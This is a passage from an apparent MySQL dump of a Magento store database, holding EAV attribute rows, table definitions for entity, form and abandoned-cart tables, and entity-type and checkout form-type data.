(214, 4, 10, 35, 120, 10),
(215, 4, 10, 35, 134, 11),
(216, 4, 10, 36, 123, 10),
(217, 4, 10, 36, 84, 20),
(218, 4, 10, 36, 85, 30),
(219, 4, 10, 36, 86, 40),
(220, 4, 10, 37, 87, 1),
(221, 4, 10, 37, 88, 2),
(222, 4, 10, 37, 89, 3),
(223, 4, 10, 37, 136, 3),
(224, 4, 10, 37, 90, 4),
(225, 4, 10, 37, 96, 5),
(226, 4, 10, 38, 135, 1),
(227, 4, 10, 39, 75, 90),
(228, 4, 10, 39, 76, 100),
(229, 4, 10, 40, 97, 5),
(230, 4, 10, 40, 91, 6),
(231, 4, 10, 40, 73, 10),
(232, 4, 10, 40, 124, 11),
(233, 4, 10, 40, 107, 14),
(234, 4, 10, 40, 108, 15),
(235, 4, 10, 40, 109, 16),
(236, 4, 10, 40, 110, 17),
(237, 4, 10, 40, 111, 18),
(238, 4, 10, 40, 112, 19),
(240, 4, 10, 40, 113, 20),
(241, 4, 10, 40, 132, 21),
(242, 4, 10, 40, 77, 30),
(243, 4, 10, 40, 131, 31),
(244, 4, 10, 40, 137, 40),
(245, 4, 10, 40, 115, 60),
(246, 4, 10, 40, 82, 70),
(247, 4, 10, 40, 133, 71),
(248, 4, 10, 40, 99, 80),
(249, 4, 10, 40, 105, 80),
(250, 4, 10, 40, 94, 90),
(251, 4, 10, 40, 95, 100),
(252, 4, 10, 40, 114, 110),
(253, 4, 10, 40, 125, 111),
(254, 4, 10, 40, 126, 112),
(255, 4, 10, 40, 127, 113),
(256, 4, 10, 40, 128, 114),
(257, 4, 10, 40, 130, 115),
(259, 4, 10, 40, 138, 1001),
(260, 4, 11, 41, 129, 10),
(261, 4, 11, 43, 101, 20),
(262, 4, 11, 43, 102, 30),
(263, 4, 11, 43, 100, 40),
(264, 4, 11, 43, 116, 50),
(265, 4, 11, 44, 104, 5),
(266, 4, 11, 44, 106, 6),
(267, 4, 11, 44, 103, 10),
(268, 4, 11, 44, 117, 51),
(269, 4, 11, 45, 78, 3),
(270, 4, 11, 45, 79, 4),
(271, 4, 11, 45, 80, 5),
(272, 4, 11, 45, 81, 6),
(273, 4, 11, 45, 92, 7),
(274, 4, 11, 45, 98, 8),
(275, 4, 11, 45, 119, 9),
(276, 4, 11, 45, 120, 10),
(277, 4, 11, 45, 134, 11),
(278, 4, 11, 46, 123, 10),
(279, 4, 11, 46, 84, 20),
(280, 4, 11, 46, 85, 30),
(281, 4, 11, 46, 86, 40),
(282, 4, 11, 47, 87, 1),
(283, 4, 11, 47, 88, 2),
(284, 4, 11, 47, 89, 3),
(285, 4, 11, 47, 136, 3),
(286, 4, 11, 47, 90, 4),
(287, 4, 11, 47, 96, 5),
(288, 4, 11, 48, 135, 1),
(289, 4, 11, 49, 75, 90),
(290, 4, 11, 49, 76, 100),
(291, 4, 11, 50, 97, 5),
(292, 4, 11, 50, 91, 6),
(293, 4, 11, 50, 73, 10),
(294, 4, 11, 50, 124, 11),
(295, 4, 11, 50, 107, 14),
(296, 4, 11, 50, 108, 15),
(297, 4, 11, 50, 109, 16),
(298, 4, 11, 50, 110, 17),
(299, 4, 11, 50, 111, 18),
(300, 4, 11, 50, 112, 19),
(301, 4, 11, 50, 74, 20),
(302, 4, 11, 50, 113, 20),
(303, 4, 11, 50, 132, 21),
(304, 4, 11, 50, 77, 30),
(305, 4, 11, 50, 131, 31),
(306, 4, 11, 50, 137, 40),
(307, 4, 11, 50, 115, 60),
(308, 4, 11, 50, 82, 70),
(309, 4, 11, 50, 133, 71),
(310, 4, 11, 50, 99, 80),
(311, 4, 11, 50, 105, 80),
(312, 4, 11, 50, 94, 90),
(313, 4, 11, 50, 95, 100),
(314, 4, 11, 50, 114, 110),
(315, 4, 11, 50, 125, 111),
(316, 4, 11, 50, 126, 112),
(317, 4, 11, 50, 127, 113),
(318, 4, 11, 50, 128, 114),
(319, 4, 11, 50, 130, 115),
(321, 4, 11, 50, 138, 1002),
(322, 4, 12, 51, 129, 10),
(323, 4, 12, 53, 101, 20),
(324, 4, 12, 53, 102, 30),
(325, 4, 12, 53, 100, 40),
(326, 4, 12, 53, 116, 50),
(327, 4, 12, 54, 104, 5),
(328, 4, 12, 54, 106, 6),
(329, 4, 12, 54, 103, 10),
(330, 4, 12, 54, 117, 51),
(331, 4, 12, 55, 78, 3),
(332, 4, 12, 55, 79, 4),
(333, 4, 12, 55, 80, 5),
(334, 4, 12, 55, 81, 6),
(335, 4, 12, 55, 92, 7),
(336, 4, 12, 55, 98, 8),
(337, 4, 12, 55, 119, 9),
(338, 4, 12, 55, 120, 10),
(339, 4, 12, 55, 134, 11),
(340, 4, 12, 56, 123, 10),
(341, 4, 12, 56, 84, 20),
(342, 4, 12, 56, 85, 30),
(343, 4, 12, 56, 86, 40),
(344, 4, 12, 57, 87, 1),
(345, 4, 12, 57, 88, 2),
(346, 4, 12, 57, 89, 3),
(347, 4, 12, 57, 136, 3),
(348, 4, 12, 57, 90, 4),
(349, 4, 12, 57, 96, 5),
(350, 4, 12, 58, 135, 1),
(351, 4, 12, 59, 75, 90),
(352, 4, 12, 59, 76, 100),
(353, 4, 12, 60, 97, 5),
(354, 4, 12, 60, 91, 6),
(355, 4, 12, 60, 73, 10),
(356, 4, 12, 60, 124, 11),
(357, 4, 12, 60, 107, 14),
(358, 4, 12, 60, 108, 15),
(359, 4, 12, 60, 109, 16),
(360, 4, 12, 60, 110, 17),
(361, 4, 12, 60, 111, 18),
(362, 4, 12, 60, 112, 19),
(363, 4, 12, 60, 74, 20),
(364, 4, 12, 60, 113, 20),
(365, 4, 12, 60, 132, 21),
(366, 4, 12, 60, 77, 30),
(367, 4, 12, 60, 131, 31),
(368, 4, 12, 60, 137, 40),
(369, 4, 12, 60, 115, 60),
(370, 4, 12, 60, 82, 70),
(371, 4, 12, 60, 133, 71),
(372, 4, 12, 60, 99, 80),
(373, 4, 12, 60, 105, 80),
(374, 4, 12, 60, 94, 90),
(375, 4, 12, 60, 95, 100),
(376, 4, 12, 60, 114, 110),
(377, 4, 12, 60, 125, 111),
(378, 4, 12, 60, 126, 112),
(379, 4, 12, 60, 127, 113),
(380, 4, 12, 60, 128, 114),
(381, 4, 12, 60, 130, 115),
(383, 4, 12, 60, 138, 1003),
(384, 4, 13, 61, 129, 10),
(385, 4, 13, 63, 101, 20),
(386, 4, 13, 63, 102, 30),
(387, 4, 13, 63, 100, 40),
(388, 4, 13, 63, 116, 50),
(389, 4, 13, 64, 104, 5),
(390, 4, 13, 64, 106, 6),
(391, 4, 13, 64, 103, 10),
(392, 4, 13, 64, 117, 51),
(393, 4, 13, 65, 78, 3),
(394, 4, 13, 65, 79, 4),
(395, 4, 13, 65, 80, 5),
(396, 4, 13, 65, 81, 6),
(397, 4, 13, 65, 92, 7),
(398, 4, 13, 65, 98, 8),
(399, 4, 13, 65, 119, 9),
(400, 4, 13, 65, 120, 10),
(401, 4, 13, 65, 134, 11),
(402, 4, 13, 66, 123, 10),
(403, 4, 13, 66, 84, 20),
(404, 4, 13, 66, 85, 30),
(405, 4, 13, 66, 86, 40),
(406, 4, 13, 67, 87, 1),
(407, 4, 13, 67, 88, 2),
(408, 4, 13, 67, 89, 3),
(409, 4, 13, 67, 136, 3),
(410, 4, 13, 67, 90, 4),
(411, 4, 13, 67, 96, 5),
(412, 4, 13, 68, 135, 1),
(413, 4, 13, 69, 75, 90),
(414, 4, 13, 69, 76, 100),
(415, 4, 13, 70, 97, 5),
(416, 4, 13, 70, 91, 6),
(417, 4, 13, 70, 73, 10),
(418, 4, 13, 70, 124, 11),
(419, 4, 13, 70, 107, 14),
(420, 4, 13, 70, 108, 15),
(421, 4, 13, 70, 109, 16),
(422, 4, 13, 70, 110, 17),
(423, 4, 13, 70, 111, 18),
(424, 4, 13, 70, 112, 19),
(425, 4, 13, 70, 74, 20),
(426, 4, 13, 70, 113, 20),
(427, 4, 13, 70, 132, 21),
(428, 4, 13, 70, 77, 30),
(429, 4, 13, 70, 131, 31),
(430, 4, 13, 70, 137, 40),
(431, 4, 13, 70, 115, 60),
(432, 4, 13, 70, 82, 70),
(433, 4, 13, 70, 133, 71),
(434, 4, 13, 70, 99, 80),
(435, 4, 13, 70, 105, 80),
(436, 4, 13, 70, 94, 90),
(437, 4, 13, 70, 95, 100),
(438, 4, 13, 70, 114, 110),
(439, 4, 13, 70, 125, 111),
(440, 4, 13, 70, 126, 112),
(441, 4, 13, 70, 127, 113),
(442, 4, 13, 70, 128, 114),
(443, 4, 13, 70, 130, 115),
(445, 4, 13, 70, 138, 1004),
(446, 4, 14, 71, 129, 10),
(447, 4, 14, 73, 101, 20),
(448, 4, 14, 73, 102, 30),
(449, 4, 14, 73, 100, 40),
(450, 4, 14, 73, 116, 50),
(451, 4, 14, 74, 104, 5),
(452, 4, 14, 74, 106, 6),
(453, 4, 14, 74, 103, 10),
(454, 4, 14, 74, 117, 51),
(455, 4, 14, 75, 78, 3),
(456, 4, 14, 75, 79, 4),
(457, 4, 14, 75, 80, 5),
(458, 4, 14, 75, 81, 6),
(459, 4, 14, 75, 92, 7),
(460, 4, 14, 75, 98, 8),
(461, 4, 14, 75, 119, 9),
(462, 4, 14, 75, 120, 10),
(463, 4, 14, 75, 134, 11),
(464, 4, 14, 76, 123, 10),
(465, 4, 14, 76, 84, 20),
(466, 4, 14, 76, 85, 30),
(467, 4, 14, 76, 86, 40),
(468, 4, 14, 77, 87, 1),
(469, 4, 14, 77, 88, 2),
(470, 4, 14, 77, 89, 3),
(471, 4, 14, 77, 136, 3),
(472, 4, 14, 77, 90, 4),
(473, 4, 14, 77, 96, 5),
(474, 4, 14, 78, 135, 1),
(475, 4, 14, 79, 75, 90),
(476, 4, 14, 79, 76, 100),
(477, 4, 14, 80, 97, 5),
(478, 4, 14, 80, 91, 6),
(479, 4, 14, 80, 73, 10),
(480, 4, 14, 80, 124, 11),
(481, 4, 14, 80, 107, 14),
(482, 4, 14, 80, 108, 15),
(483, 4, 14, 80, 109, 16),
(484, 4, 14, 80, 110, 17),
(485, 4, 14, 80, 111, 18),
(486, 4, 14, 80, 112, 19),
(487, 4, 14, 80, 74, 20),
(488, 4, 14, 80, 113, 20),
(489, 4, 14, 80, 132, 21),
(490, 4, 14, 80, 77, 30),
(491, 4, 14, 80, 131, 31),
(492, 4, 14, 80, 137, 40),
(493, 4, 14, 80, 115, 60),
(494, 4, 14, 80, 82, 70),
(495, 4, 14, 80, 133, 71),
(496, 4, 14, 80, 99, 80),
(497, 4, 14, 80, 105, 80),
(498, 4, 14, 80, 94, 90),
(499, 4, 14, 80, 95, 100),
(500, 4, 14, 80, 114, 110),
(501, 4, 14, 80, 125, 111),
(502, 4, 14, 80, 126, 112),
(503, 4, 14, 80, 127, 113),
(504, 4, 14, 80, 128, 114),
(505, 4, 14, 80, 130, 115),
(507, 4, 14, 80, 138, 1005),
(508, 4, 15, 81, 129, 10),
(509, 4, 15, 83, 101, 20),
(510, 4, 15, 83, 102, 30),
(511, 4, 15, 83, 100, 40),
(512, 4, 15, 83, 116, 50),
(513, 4, 15, 84, 104, 5),
(514, 4, 15, 84, 106, 6),
(515, 4, 15, 84, 103, 10),
(516, 4, 15, 84, 117, 51),
(517, 4, 15, 85, 78, 3),
(518, 4, 15, 85, 79, 4),
(519, 4, 15, 85, 80, 5),
(520, 4, 15, 85, 81, 6),
(521, 4, 15, 85, 92, 7),
(522, 4, 15, 85, 98, 8),
(523, 4, 15, 85, 119, 9),
(524, 4, 15, 85, 120, 10),
(525, 4, 15, 85, 134, 11),
(526, 4, 15, 86, 123, 10),
(527, 4, 15, 86, 84, 20),
(528, 4, 15, 86, 85, 30),
(529, 4, 15, 86, 86, 40),
(530, 4, 15, 87, 87, 1),
(531, 4, 15, 87, 88, 2),
(532, 4, 15, 87, 89, 3),
(533, 4, 15, 87, 136, 3),
(534, 4, 15, 87, 90, 4),
(535, 4, 15, 87, 96, 5),
(536, 4, 15, 88, 135, 1),
(537, 4, 15, 89, 75, 90),
(538, 4, 15, 89, 76, 100),
(539, 4, 15, 90, 97, 5),
(540, 4, 15, 90, 91, 6),
(541, 4, 15, 90, 73, 10),
(542, 4, 15, 90, 124, 11),
(543, 4, 15, 90, 107, 14),
(544, 4, 15, 90, 108, 15),
(545, 4, 15, 90, 109, 16),
(546, 4, 15, 90, 110, 17),
(547, 4, 15, 90, 111, 18),
(548, 4, 15, 90, 112, 19),
(549, 4, 15, 90, 74, 20),
(550, 4, 15, 90, 113, 20),
(551, 4, 15, 90, 132, 21),
(552, 4, 15, 90, 77, 30),
(553, 4, 15, 90, 131, 31),
(554, 4, 15, 90, 137, 40),
(555, 4, 15, 90, 115, 60),
(556, 4, 15, 90, 82, 70),
(557, 4, 15, 90, 133, 71),
(558, 4, 15, 90, 99, 80),
(559, 4, 15, 90, 105, 80),
(560, 4, 15, 90, 94, 90),
(561, 4, 15, 90, 95, 100),
(562, 4, 15, 90, 114, 110),
(563, 4, 15, 90, 125, 111),
(564, 4, 15, 90, 126, 112),
(565, 4, 15, 90, 127, 113),
(566, 4, 15, 90, 128, 114),
(567, 4, 15, 90, 130, 115),
(569, 4, 15, 90, 138, 1006),
(571, 4, 15, 90, 139, 1007),
(573, 4, 11, 50, 140, 1008),
(575, 4, 12, 60, 140, 1009),
(577, 4, 13, 70, 140, 1010),
(583, 4, 15, 90, 140, 1013),
(585, 4, 9, 30, 93, 1014),
(587, 4, 10, 40, 93, 1015),
(589, 4, 15, 90, 93, 1016),
(591, 4, 11, 50, 93, 1017),
(593, 4, 12, 60, 93, 1018),
(595, 4, 13, 70, 93, 1019),
(597, 4, 15, 90, 141, 1020),
(599, 4, 15, 90, 142, 1021),
(601, 4, 11, 50, 143, 1022),
(603, 4, 12, 60, 143, 1023),
(605, 4, 13, 70, 143, 1024),
(607, 4, 11, 50, 144, 1025),
(609, 4, 12, 60, 144, 1026),
(611, 4, 13, 70, 144, 1027),
(613, 4, 12, 60, 145, 1028),
(615, 4, 13, 70, 145, 1029),
(617, 4, 11, 50, 146, 1030),
(619, 4, 15, 90, 146, 1031),
(621, 4, 9, 30, 146, 1032),
(623, 4, 10, 40, 146, 1033),
(625, 4, 11, 50, 147, 1034),
(627, 4, 15, 90, 147, 1035),
(629, 4, 9, 30, 147, 1036),
(631, 4, 10, 40, 147, 1037),
(633, 4, 11, 50, 148, 1038),
(635, 4, 15, 90, 148, 1039),
(637, 4, 9, 30, 148, 1040),
(639, 4, 10, 40, 148, 1041),
(641, 4, 11, 50, 149, 1042),
(643, 4, 15, 90, 149, 1043),
(645, 4, 9, 30, 149, 1044),
(647, 4, 10, 40, 149, 1045),
(649, 4, 11, 50, 150, 1046),
(651, 4, 15, 90, 150, 1047),
(653, 4, 9, 30, 150, 1048),
(655, 4, 10, 40, 150, 1049),
(657, 4, 14, 80, 151, 1000),
(659, 4, 10, 40, 152, 1000),
(661, 4, 9, 30, 153, 1001),
(663, 4, 9, 30, 140, 1002),
(665, 4, 10, 40, 140, 1003),
(667, 4, 9, 30, 154, 1004),
(669, 4, 10, 40, 145, 1005),
(671, 4, 9, 30, 145, 1006),
(673, 4, 9, 30, 155, 1007),
(675, 4, 9, 30, 156, 1008),
(677, 4, 10, 40, 156, 1009),
(679, 4, 9, 30, 157, 1010),
(681, 4, 10, 40, 157, 1011),
(683, 4, 10, 40, 74, 20);

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_datetime`
--

CREATE TABLE `eav_entity_datetime` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` datetime DEFAULT NULL COMMENT 'Attribute Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Value Prefix';

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_decimal`
--

CREATE TABLE `eav_entity_decimal` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Attribute Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Value Prefix';

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_int`
--

CREATE TABLE `eav_entity_int` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` int(11) NOT NULL DEFAULT 0 COMMENT 'Attribute Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Value Prefix';

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_store`
--

CREATE TABLE `eav_entity_store` (
  `entity_store_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity Store ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `increment_prefix` varchar(20) DEFAULT NULL COMMENT 'Increment Prefix',
  `increment_last_id` varchar(50) DEFAULT NULL COMMENT 'Last Incremented ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Store';

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_text`
--

CREATE TABLE `eav_entity_text` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` text NOT NULL COMMENT 'Attribute Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Value Prefix';

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_type`
--

CREATE TABLE `eav_entity_type` (
  `entity_type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Entity Type ID',
  `entity_type_code` varchar(50) NOT NULL COMMENT 'Entity Type Code',
  `entity_model` varchar(255) NOT NULL COMMENT 'Entity Model',
  `attribute_model` varchar(255) DEFAULT NULL COMMENT 'Attribute Model',
  `entity_table` varchar(255) DEFAULT NULL COMMENT 'Entity Table',
  `value_table_prefix` varchar(255) DEFAULT NULL COMMENT 'Value Table Prefix',
  `entity_id_field` varchar(255) DEFAULT NULL COMMENT 'Entity ID Field',
  `is_data_sharing` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Defines Is Data Sharing',
  `data_sharing_key` varchar(100) DEFAULT 'default' COMMENT 'Data Sharing Key',
  `default_attribute_set_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Default Attribute Set ID',
  `increment_model` varchar(255) DEFAULT NULL COMMENT 'Increment Model',
  `increment_per_store` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Increment Per Store',
  `increment_pad_length` smallint(5) UNSIGNED NOT NULL DEFAULT 8 COMMENT 'Increment Pad Length',
  `increment_pad_char` varchar(1) NOT NULL DEFAULT '0' COMMENT 'Increment Pad Char',
  `additional_attribute_table` varchar(255) DEFAULT NULL COMMENT 'Additional Attribute Table',
  `entity_attribute_collection` varchar(255) DEFAULT NULL COMMENT 'Entity Attribute Collection'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Type';

--
-- Dumping data for table `eav_entity_type`
--

INSERT INTO `eav_entity_type` (`entity_type_id`, `entity_type_code`, `entity_model`, `attribute_model`, `entity_table`, `value_table_prefix`, `entity_id_field`, `is_data_sharing`, `data_sharing_key`, `default_attribute_set_id`, `increment_model`, `increment_per_store`, `increment_pad_length`, `increment_pad_char`, `additional_attribute_table`, `entity_attribute_collection`) VALUES
(1, 'customer', 'Magento\\Customer\\Model\\ResourceModel\\Customer', 'Magento\\Customer\\Model\\Attribute', 'customer_entity', NULL, NULL, 1, 'default', 1, 'Magento\\Eav\\Model\\Entity\\Increment\\NumericValue', 0, 8, '0', 'customer_eav_attribute', 'Magento\\Customer\\Model\\ResourceModel\\Attribute\\Collection'),
(2, 'customer_address', 'Magento\\Customer\\Model\\ResourceModel\\Address', 'Magento\\Customer\\Model\\Attribute', 'customer_address_entity', NULL, NULL, 1, 'default', 2, NULL, 0, 8, '0', 'customer_eav_attribute', 'Magento\\Customer\\Model\\ResourceModel\\Address\\Attribute\\Collection'),
(3, 'catalog_category', 'Magento\\Catalog\\Model\\ResourceModel\\Category', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'catalog_category_entity', NULL, NULL, 1, 'default', 3, NULL, 0, 8, '0', 'catalog_eav_attribute', 'Magento\\Catalog\\Model\\ResourceModel\\Category\\Attribute\\Collection'),
(4, 'catalog_product', 'Magento\\Catalog\\Model\\ResourceModel\\Product', 'Magento\\Catalog\\Model\\ResourceModel\\Eav\\Attribute', 'catalog_product_entity', NULL, NULL, 1, 'default', 4, NULL, 0, 8, '0', 'catalog_eav_attribute', 'Magento\\Catalog\\Model\\ResourceModel\\Product\\Attribute\\Collection'),
(5, 'order', 'Magento\\Sales\\Model\\ResourceModel\\Order', NULL, 'sales_order', NULL, NULL, 1, 'default', 5, 'Magento\\Eav\\Model\\Entity\\Increment\\NumericValue', 1, 8, '0', NULL, NULL),
(6, 'invoice', 'Magento\\Sales\\Model\\ResourceModel\\Order\\Invoice', NULL, 'sales_invoice', NULL, NULL, 1, 'default', 6, 'Magento\\Eav\\Model\\Entity\\Increment\\NumericValue', 1, 8, '0', NULL, NULL),
(7, 'creditmemo', 'Magento\\Sales\\Model\\ResourceModel\\Order\\Creditmemo', NULL, 'sales_creditmemo', NULL, NULL, 1, 'default', 7, 'Magento\\Eav\\Model\\Entity\\Increment\\NumericValue', 1, 8, '0', NULL, NULL),
(8, 'shipment', 'Magento\\Sales\\Model\\ResourceModel\\Order\\Shipment', NULL, 'sales_shipment', NULL, NULL, 1, 'default', 8, 'Magento\\Eav\\Model\\Entity\\Increment\\NumericValue', 1, 8, '0', NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `eav_entity_varchar`
--

CREATE TABLE `eav_entity_varchar` (
  `value_id` int(11) NOT NULL COMMENT 'Value ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `entity_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Attribute Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Entity Value Prefix';

-- --------------------------------------------------------

--
-- Table structure for table `eav_form_element`
--

CREATE TABLE `eav_form_element` (
  `element_id` int(10) UNSIGNED NOT NULL COMMENT 'Element ID',
  `type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Type ID',
  `fieldset_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Fieldset ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `sort_order` int(11) NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Form Element';

--
-- Dumping data for table `eav_form_element`
--

INSERT INTO `eav_form_element` (`element_id`, `type_id`, `fieldset_id`, `attribute_id`, `sort_order`) VALUES
(1, 1, NULL, 23, 0),
(2, 1, NULL, 25, 1),
(3, 1, NULL, 27, 2),
(4, 1, NULL, 9, 3),
(5, 1, NULL, 28, 4),
(6, 1, NULL, 29, 5),
(7, 1, NULL, 31, 6),
(8, 1, NULL, 33, 7),
(9, 1, NULL, 30, 8),
(10, 1, NULL, 34, 9),
(11, 1, NULL, 35, 10),
(12, 2, NULL, 23, 0),
(13, 2, NULL, 25, 1),
(14, 2, NULL, 27, 2),
(15, 2, NULL, 9, 3),
(16, 2, NULL, 28, 4),
(17, 2, NULL, 29, 5),
(18, 2, NULL, 31, 6),
(19, 2, NULL, 33, 7),
(20, 2, NULL, 30, 8),
(21, 2, NULL, 34, 9),
(22, 2, NULL, 35, 10),
(23, 3, NULL, 23, 0),
(24, 3, NULL, 25, 1),
(25, 3, NULL, 27, 2),
(26, 3, NULL, 28, 3),
(27, 3, NULL, 29, 4),
(28, 3, NULL, 31, 5),
(29, 3, NULL, 33, 6),
(30, 3, NULL, 30, 7),
(31, 3, NULL, 34, 8),
(32, 3, NULL, 35, 9),
(33, 4, NULL, 23, 0),
(34, 4, NULL, 25, 1),
(35, 4, NULL, 27, 2),
(36, 4, NULL, 28, 3),
(37, 4, NULL, 29, 4),
(38, 4, NULL, 31, 5),
(39, 4, NULL, 33, 6),
(40, 4, NULL, 30, 7),
(41, 4, NULL, 34, 8),
(42, 4, NULL, 35, 9);

-- --------------------------------------------------------

--
-- Table structure for table `eav_form_fieldset`
--

CREATE TABLE `eav_form_fieldset` (
  `fieldset_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Fieldset ID',
  `type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Type ID',
  `code` varchar(64) NOT NULL COMMENT 'Code',
  `sort_order` int(11) NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Form Fieldset';

-- --------------------------------------------------------

--
-- Table structure for table `eav_form_fieldset_label`
--

CREATE TABLE `eav_form_fieldset_label` (
  `fieldset_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Fieldset ID',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID',
  `label` varchar(255) NOT NULL COMMENT 'Label'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Form Fieldset Label';

-- --------------------------------------------------------

--
-- Table structure for table `eav_form_type`
--

CREATE TABLE `eav_form_type` (
  `type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Type ID',
  `code` varchar(64) NOT NULL COMMENT 'Code',
  `label` varchar(255) NOT NULL COMMENT 'Label',
  `is_system` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Is System',
  `theme` varchar(64) DEFAULT NULL COMMENT 'Theme',
  `store_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Store ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Form Type';

--
-- Dumping data for table `eav_form_type`
--

INSERT INTO `eav_form_type` (`type_id`, `code`, `label`, `is_system`, `theme`, `store_id`) VALUES
(1, 'checkout_onepage_register', 'checkout_onepage_register', 1, '', 0),
(2, 'checkout_onepage_register_guest', 'checkout_onepage_register_guest', 1, '', 0),
(3, 'checkout_onepage_billing_address', 'checkout_onepage_billing_address', 1, '', 0),
(4, 'checkout_onepage_shipping_address', 'checkout_onepage_shipping_address', 1, '', 0);

-- --------------------------------------------------------

--
-- Table structure for table `eav_form_type_entity`
--

CREATE TABLE `eav_form_type_entity` (
  `type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Type ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Entity Type ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Form Type Entity';

--
-- Dumping data for table `eav_form_type_entity`
--

INSERT INTO `eav_form_type_entity` (`type_id`, `entity_type_id`) VALUES
(1, 1),
(1, 2),
(2, 1),
(2, 2),
(3, 2),
(4, 2);

-- --------------------------------------------------------

--
-- Table structure for table `email_abandoned_cart`
--

CREATE TABLE `email_abandoned_cart` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `quote_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Quote Id',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store Id',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `email` varchar(255) NOT NULL DEFAULT '' COMMENT 'Email',
  `status` varchar(255) NOT NULL DEFAULT '' COMMENT 'Contact Status',
  `is_active` smallint(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT 'Quote Active',
  `quote_updated_at` timestamp NULL DEFAULT NULL COMMENT 'Quote updated at',
  `abandoned_cart_number` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Abandoned Cart number',
  `items_count` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Quote items count',
  `items_ids` varchar(255) DEFAULT NULL COMMENT 'Quote item ids',
  `created_at` timestamp NULL DEFAULT NULL COMMENT 'Created At',
